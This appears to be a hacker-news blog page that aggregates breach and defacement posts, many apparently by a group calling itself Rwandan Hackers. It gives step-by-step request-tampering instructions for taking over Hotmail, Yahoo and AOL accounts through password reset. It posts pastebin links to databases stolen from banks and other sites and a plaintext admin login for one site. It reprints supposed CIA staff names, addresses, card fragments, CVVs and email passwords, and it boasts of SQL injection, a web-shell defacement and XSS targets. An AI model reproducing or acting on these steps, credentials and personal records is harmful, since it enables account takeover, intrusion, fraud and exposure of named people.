Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose.

Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.”

Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result.

Here Below Hacker Demonstrated Vulnerabilities:

1.) Hotmail :

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

2.) Yahoo

Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2. EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password
Step 6. Start Tamper Data All in Element Z

3.) AOL:

Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done

source the hacker new

Garmin South Africa Hacked by Rwandan Hackers

Rwandan Hackers hacked into nto a high profile website Garmin Southern Africa (garmin.co.za).
GARMIN, the world leader in Global Positioning System (GPS) technology and an innovator in consumer lifestyle electronics.
we published more than 100 account have been stolen,username,password and emai;cellphone
DATABASE LINK:http://pastebin.com/fuva0Lai
Account hacked

www.autotrader.co.tz database compromised

                                               ADMIN PANEL OF AUTOTRADER
Rwandan Hackers published information on the server on which the site is hosted, the database’s structure, along with the usernames and password of 498 users of autotrader tanzania
DATABASE INFO:http://pastebin.com/x4AVEA5k
admin login:http://www.autotrader.co.tz/admin/
username: admin
password: 0163783644

Makerere University Hacked by Rwandan Hacker

The website hacked are
http://zoology.mak.ac.ug (Makerere University Department Of Zoology )
http://www.sportsscience.mak.ac.ug(Makerere UniversityDepartment Of Sports Science)
we found a sql injection in web page,Using the vulnerability an attacker can exploit the entire database and gain illegal access .

Makerere University (MAK), Uganda's largest and second-oldest higher institution of learning, (the oldest is Katigondo National Major Seminary in Masaka District, which was established in 1911), was first established as a technical school in 1922. In 1963 it became the University of East Africa, offering courses leading to general degrees from the University of London. It became an independent national university in 1970 when the University of East Africa was split into three independent universities: University of Nairobi (Kenya), University of Dar es Salaam (Tanzania) and Makerere University. Today, Makerere University has 22 faculties, institutes and schools offering programmes for about 30,000 undergraduates and 3,000 postgraduates.

Makerere was home to many post-independence African leaders, including former Ugandan president Milton Obote and late Tanzanian president Julius Nyerere. Former Tanzanian president Benjamin Mkapa and current Kenyan president Mwai Kibaki are also Makerere alumni.

In the years immediately after Uganda's independence, Makerere University was a focal point for the literary activity that was central to African nationalist culture. Some prominent writers, including Nuruddin Farah, Ali Mazrui, David Rubadiri, Okello Oculi, Ngũgĩ wa Thiong'o, John Ruganda, Paul Theroux, V. S. Naipaul and Peter Nazareth, were at Makerere University at one point in their writing and academic careers.

In September 2011, the university announced that it would close indefinitely following a week-long strike by the lecturers who refused resume work until their demands were met.

Database of  Makerere University Department Of Zoology
-http://pastebin.com/WCghhaKx
Database of Makerere University Department Of Sports Science
-http://pastebin.com/S8uQVnPq

Fidelity Bank hacked by Rwandan Hackers

Fidelity Bank hacked by Rwandan hackers ,.The database has been hacked and exposed in pastebin note Fidelity Bank is a commercial bank in Ghana which was issued with its Universal Banking License on June 28th 2006, making it the 22nd bank to be licensed by the Bank of Ghana.It is one of the twenty-seven (27) licensed commercial banks in the country.

he Bank is owned by Ghanaian and Foreign individual and institutional investors including ADB and SSNIT, and also by its Executives.

DATABASE LINK: http://pastebin.com/Hbvq0UrU

TV3 Network Limited (TV3 Ghana) again hacked by Rwandan Hackers

TV3 database compromised by rwandan hackers.TV3 Network Limited (TV3 Ghana) is a private, free-to-air television broadcaster in Ghana. Launched in 1997, TV3 Ghana airs and produces a variety of television programmes including acclaimed news bulletins, dramas and successful reality television and entertainment shows.
TV3 Ghana established itself as the most watched free-to-air television station in Ghana, having achieved 65% nationwide penetration at end-2006 and aiming to reach 90% by 2008.
DATABASE LINK : http://pastebin.com/G6gNcxYL

www.combanketh.com database compromised

 www.combanketh.com hacked by rwandan hackers,we found a sql injection in www.combanketh.com.
we also posted the database in pastebin note.The Commercial Bank of Ethiopia (CBE) is the largest commercial bank in Ethiopia and had about Birr 73.7 billion (US$4.45 billion), in assets at the end of June 2010. At the time, the bank held approximately 63.5% of deposits and about 38% of all bank loans in the country. The bank has about 9, 000 employees who staff the headquarters and 301 branches positioned in the main cities and regional towns, including 45 branches in Addis Ababa. CBE recently opened new branches in the remote towns of Injibara and Humera
Database Link : http://pastebin.com/cuRHsrPW

victoria bank hacked by Rwandan Hackers #OPKENYANBANK

Victoria Commercial Bank  hacked by rwandan hackers.
Victoria Commercial Bank (VCB) is a Private Bank in Kenya. It is one of the forty-four (44) licensed commercial banks in the country.
The bank is a Tier 3 Private Bank in Kenya, East Africa's largest economy. VCB focuses on serving large corporations and high net-worth clients. The bank also offers personal banking services to the employees of its corporate clients.[3] As of December 2010, VCB was ranked number thirty-three (33), by assets, out of forty-three (43) licensed commercial banks in Kenya.[4]
In the 2010 Banking survey (Financials 2009) the bank was positioned No.1 in terms of performance in the small banks category and 7th overall out of all the Banks in Kenya
 database leaked in pastebin note link : http://pastebin.com/8gf1q4Ln

                                                   IT WAS #OPKENYANBANK

CIA hacked !!!

An unnamed hacker behind a code name "CyberZeist" has revealed some classified information regarding the official website of Central Intelligence Agency (CIA). He also exposed server details, DNS information, administrator login panel and so on. All the exposure is made available to public in a open pastebin release. Which also contains certain information about five undercover CIA agent's including real name, age, full postal address, banking details, credit card information, email-id & passwords. According to the release of the hacker the mail aim of this breach is stand against online censorship. The hacker also threatened that he will leak more details. Its hard to say whether those exposure are legitimate or not. Still the CIA authority is silent about this breach. We would like to give you reminder that this is not the 1st time earlier in 2011 and 2012 CIA has fallen victim of cyber attack. If you dig the history we will find that in 2011 Lulzsec hit CIA & SOCA with massive DDoS attack which immediately sent the website offline for a certain period of time. Also this year in #Friday rampage hacker collective Anonymous targeted CIA again with DDoS attack.


Here are some Leaked Accounts of some CIA Field Agents(stationed at Virginia), Documents, and website infos of - https://cia.gov

To CIA - Where is your security gals ;)



----------------------------------------------------------------------------------

website - https://www.cia.gov/
Location - Virginia - Reston

WebSite Last Updated -     Mon, 09 Apr 2012 16:53:44 GMT (At time of exploitation)


--------------------------------------DETAILS--------------------------------------


[ localityName=Mclean
stateOrProvinceName=Virginia
countryName=US
serialNumber=Government Entity
businessCategory=Government Entity
1.3.6.1.4.1.311.60.2.1.3=US ]

Website SSL serial Number - 1B6E90CFD3E033B37EA656F068ECB80F(Registered to Jason Robert, cia-intercom chief) using SSL v3.0[non updated]

Server IP - 156.154.70.10 (apache)

Lookup for A records of cia.gov
Host - cia.gov.
TTl - 14400
A answer- 198.81.129.107

Site Etag : 890e-4bd41d95b3600

Admin Login Handle - ucia-gw.customer.alter.net (157.130.59.190)

----------------------------------------------------------------------------------
[[[[[[[[[ Hacked Accounts ]]]]]]]]]]
----------------------------------------------------------------------------------

1. Nathan C. Shea
   Address -  Lockwood Rd
              Henrico, VA
   Zip - 20190
   B'Day - September 5, 1976 (35 years old)
   Visa - 4916 5207 0220 XXXX
   UPS tracking number -1Z 8Y3 327 95 5468 353 9
       Email ID: nathacsh@cia.gov 
       Password - Nee1zu3Ai91d4 


2. Daniel Vida
   Address - Pretty Lake Ave
             Norfolk, VA
   B'Day - January 10, 1974 (38 years old)
   Visa - 4716 5639 4375 XXXX
   CVV2 - 027
   UPS tracking number - 1Z 199 062 00 5717 481 2
       Email ID: dan.vida3@cia.gov 
       Password - tiXue2vooL4fdwq 

3. Kevin Morehead
   Address - Ox Rd
             Woodstock, VA
   Zip - 20194
   B'Day - October 27, 1975 (36 years old) 
   Visa - 5207 9306 2697 XXXX
   CVC2 - 370
   UPS tracking number - 1Z 831 725 07 7755 563 5
       EMail ID : morehead.kev@cia.gov 
       Password - MeijaaG8eimm6 

4. Ronnie B. Allen
   Address - Richmond VA
   Zip - 20191
   B'Day - April 5, 1973 (39 years old)
   MasterCard - 5208 6923 4319 XXXx
   CVC2 - 947
   UPS tracking number - 1Z 581 796 27 1185 535 6
       Email ID - RonnieBAllen@cia.gov 
       Password - eiqu7kae1Rt 

5. Darrell A. Dunleavy
   Address - Montpelier Ct
             Woodbridge, VA
   Zip - 20194
   B'Day - November 20, 1973 (38 years old)
   MasterCard - 5480 7450 0976 XXXX
   CVC2 - 820
   UPS tracking number - 1Z 054 879 87 9434 053 8
       Email ID : darrelladunl41@cia.gov 
       Password - Uth2a675hheG 



........ SOme more details will be leaked soon, CIA Beware!

  -CyberZeist (Against Online Censorship)

Web is vulnerable to hashing denial-of-service attack ( #hashdos ) with Demo

Researchers have shown how a flaw that is common to most popular Web programming languages can be used to launch denial-of-service attacks by exploiting hash table as reported by Jon from Ars Technica. Researchers presented information on a long standing vulnerability in most web application frameworks at 28th Chaos Communication Congress security conference in Berlin, Germany, Earth, Milky Way. Alexander “alech” Klink and Julian “zeri” Wälde delivered a demonstration and lecture titled "Efficient Denial of Service Attacks on Web Application Platforms". In their lecture they explained in detail how most web programming languages utilize hashes and manage collisions.

The flaw affects a long list of technologies, including PHP, ASP.NET, Java, Python, Ruby, Apache Tomcat, Apache Geronimo, Jetty, and Glassfish, as well as Google's open source JavaScript engine V8. The vendors and developers behind these technologies are working to close the vulnerability, with Microsoft warning of "imminent public release of exploit code" for what is known as a hash collision attack.

Klink and Wälde showed that "PHP 5, Java, ASP.NET as well as V8 are fully vulnerable to this issue and PHP 4, Python and Ruby are partially vulnerable, depending on version or whether the server running the code is a 32-bit or 64-bit machine."

"This attack is mostly independent of the underlying Web application and just relies on a common fact of how Web application servers typically work," the team wrote, noting that such attacks would force Web application servers to use 99% of CPU for several minutes to hours for a single HTTP request. "Hash tables are a commonly used data structure in most programming languages," they explained. "Web application servers or platforms commonly parse attacker-controlled POST form data into hash tables automatically, so that they can be accessed by application developers. If the language does not provide a randomized hash function or the application server does not recognize attacks using multi-collisions, an attacker can degenerate the hash table by sending lots of colliding keys. The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request."

Microsoft has released a workaround for an ASP.NET vulnerability to help protect Websites against potential denial-of-service (DoS) attacks, according to a security advisory.

The vulnerability is considered serious because an attacker could take down a site by consuming all CPU resources on a Web server, or cluster of servers, using a series of specially crafted, 100KB HTTP requests. Just one such request could consume 100 percent of one CPU core for between 90 and 110 seconds.

"An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or cluster of servers," Suha and Jonathan Ness, engineers with Microsoft Security Response Center said. Microsoft was unaware of any DoS attacks exploiting the vulnerability. Nevertheless, Microsoft decided to release a workaround, because detailed information on the flaw is publicly available.

Andrew Storms, director of security operations for nCircle said: "This isn’t your average DoS attack because it doesn’t take a botnet or a lot of coordination to take a web server down. Most DoS attacks rely on a huge number of small requests targeted at a specific web server to overwhelm it. In this case, a single request can consume a single core for 90 seconds. Queue up a few of these requests every few minutes and the site will be essentially knocked offline."

Demonstration
You can download the Video Demo from here and Hash collisions in POST Denial-of-service exploit online demo or Script source code is Here.

Available Countermeasures :
1.) Limiting the number of different HTTP request parameters (PHP, Tomcat) : PHP has added a new configuration variable max_input_vars, that can limit the number of parameters. This is similar to the first solution, except that here, not the total length of the request is limited, instead the number of different parameters that can be submitted in a single request is limited.
2.) Limiting HTTP POST and GET request lengths (Microsoft ASP.NET) : Microsoft suggests to limit the HTTP request length. Most applications don’t require very long HTTP requests, except for file uploads.


    <configuration>

     <system.web>
     <httpRuntime maxRequestLength="200”/>
     </system.web>
    </configuration>

As long as you don’t process data in a hash table from any other sources, except from the HTTP request (like external URLs), this should prevent the basic form of the attack.

Also , oCERT has a good summary about affected and fixed software versions & There is an advisory on full disclosure that describes the attack in det

SOURCE: www.thehackernews.com

Socabu Burundi hacked by Rwandan Hackers

                                                   ADMIN PANEL OF SOCABU

Socabu Burundi get hacked by rwandan hackers we found sql injection vulnerability.Using the vulnerability an attacker can exploit the entire database and gain illegal access
The database has been hacked and exposed in pastebin note link:http://pastebin.com/BQ11GTZa

www.coalworld.net hacked by Rwandan Hackers #OPRWANDANGENOCIDE

www.coalworld.net have been hacked by rwandan.
we use "jsp Webfolder Managment" A new shell and Deface upload exploit and
our message was:don't forget that in April 1994 million of tutsis lost their lives in genocide and international community cowardly deny them support
website hacked : http://www.coalworld.net/111.jsp

www.gov.rw vulnerable to Cross-site scripting

Rwandan hackers discovered Cross site scripting Vulnerability in www.gov.rw.
Cross-site scripting (XSS) is a type of computer insecurity vulnerability typically found in Web applications (such as web browsers through breaches of browser security) that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
Several website are vulnerable:
www.inyarwanda.com

www.paulkagame.com

www.igihe.com